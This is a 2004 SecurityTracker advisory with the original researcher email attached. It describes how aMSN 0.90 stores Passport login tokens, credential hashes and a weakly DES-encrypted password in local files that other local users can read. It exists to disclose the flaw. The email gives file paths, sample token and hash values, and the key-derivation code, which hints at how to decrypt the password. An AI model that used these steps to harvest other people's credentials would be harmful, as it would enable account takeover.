SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   aMSN Vendors:   amsn.sourceforge.net
aMSN Discloses Password Hashes to Local Users
SecurityTracker Alert ID:  1010555
SecurityTracker URL:  http://securitytracker.com/id/1010555
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 21 2004
Impact:   Disclosure of authentication information

Version(s): 0.90
Description:   Lostmon reported a vulnerability in aMSN. A local user can obtain hashed passwords.

It is reported that the software stores the user's hashed password in the 'hotlog.htm' file. A local user may be able to decrypt the password, the report said.

Impact:   A local user can obtain a user's hashed password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/tracker/index.php?func=detail&aid=976450&group_id=54091&atid=472655 (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Tested on Windows 2000 SP4

Message History:   None.


 Source Message Contents

Subject:  some important information about amsn windows client disclose: user


This is a multi-part message in MIME format.
--------------000309070006060408050602
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit


Hello :
i found this bug in amsn client :
http://sourceforge.net/tracker/index.php?func=detail&aid=976450&group_id=54091&atid=472655



Windows


=============================================================================
1. Introduction
2. What it was tested on
3. How to reproduce the exploit
4. Conclusion
5. Fix
=============================================================================
1. After studying the instant messager client aMSN (v0.90)for
windows and looking in their files; I noticed that a local maliciously user
could obtain with hash one user who were logged in amsn:
=============================================================================

2. This was tested on:
  Amsn v 0.90 client
win 2000 pro sp4 built 2195
=============================================================================
open the messenger client amsn; login hotmail wih our user and password.
After we open our e-mail and we click in the tray enveloppe who notices that we
have a new mail,
the explorer is open and we see that locally one page is open
from the local place, file:///C:/Documents%20and%20Settings/Lostmon/amsn/hotlog.htm
As we can see, this is the local route from de profile user who started the
session in the pc :/
If we open this folder and we see this route, specially this file we find the
following:
=============================================================================
code of file hotdog.htm

<html>
<head>
<noscript>
<meta http-equiv=Refresh content="0; url=http://www.hotmail.com">
</noscript>
</head>
<body onload="document.pform.submit(); ">
<form name="pform"
action="https://loginnet.passport.com/ppsecure/md5auth.srf?lc=1033" method="POST">
<input type="hidden" name="mode" value="ttl">
<input type="hidden" name="login" value="yourfull">
<input type="hidden" name="username" value="yourfull@hotmail.com">
<input type="hidden" name="sid" value="507">
<input type="hidden" name="rru" value="/cgi-bin/HoTMaiL">
<input type="hidden" name="auth"
value="58eRJLDWhDzdS64AsWCR1FKtjcWTkW76jtnGCOdp7bvlsr1wUHbfGLystSU6ig6bpdx7zGmj15d2MmglLZxr!iAQ$$">
<input type="hidden" name="creds" value="a93e78753eed0fe90ae59a9245d459d0">
<input type="hidden" name="svc" value="mail"><input type="hidden" name="js"
value="yes">
</form>
</body>
</html>
=============================================================================

Looking this infomation we noticed how is the sending way used in this form,
executed

But things are not finished here, if we look in the folder %userroot%amsn\
looking very careful we have a config.xml and in his last lines has this entry :
=============================================================================
part of code of config.xml

<entry>
       <attribute>remotepassword</attribute>
       <value>c26ccaaba25f6642</value>
    </entry>
ummmmmm

We suppose that remote password is the password who allows identify every account :/
thus if we make a through investigation looking from where is this remote
password coming from, we arrive to folder c:\program files \amsn\scripts\
and if we look among these files we find: config.tcl
In the line 296 we have this:
   }

     if { ($config(save_password)) && ($password != "")} {

	set key [string range "${loginback}dummykey" 0 7]
	binary scan [::des::encrypt $key "${password}\n"] h* encpass
	puts $file_id "   <entry>\n      <attribute>encpassword</attribute>\n
<value>$encpass</value>\n   </entry>"
     }

     set key [string range "${loginback}dummykey" 0 7]
     binary scan [::des::encrypt $key "${config(remotepassword)}\n"] h* encpass
     puts $file_id "   <entry>\n      <attribute>remotepassword</attribute>\n
  <value>$encpass</value>\n   </entry>\n"

     foreach custom $config(customsmileys2) {
	puts $file_id "   <emoticon>"
	foreach attribute [array names emotions] {
	    if { [string match "${custom}_*" $attribute ] } {
		set var_attribute [::sxml::xmlreplace [string map [list "${custom}_" ""]
$attribute ]]
		set var_value [::sxml::xmlreplace $emotions($attribute)]
		puts $file_id "      <$var_attribute>$var_value</$var_attribute>"
	    }

=============================================================================
These are functions that codify the remote password umm :/
If we could look the background in this file we will be able to say that there
are the variables neccessaries to revert certains functions.

Yours faithfully

#dismarking
greetings to RotteW and LuTRiZiA so many nigth whith me :DDDD

Lostmon (lostmon@spymac.com)



La curiosidad es lo que hace mover a la mente ...




---- Msg sent via Spymac Mail - http://www.spymac.com



--------------000309070006060408050602
Content-Type: text/plain;
 name="30375amsn1.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="30375amsn1.txt"


--------------000309070006060408050602
Content-Type: text/plain;
 name="amsn1.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="amsn1.txt"


--------------000309070006060408050602--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC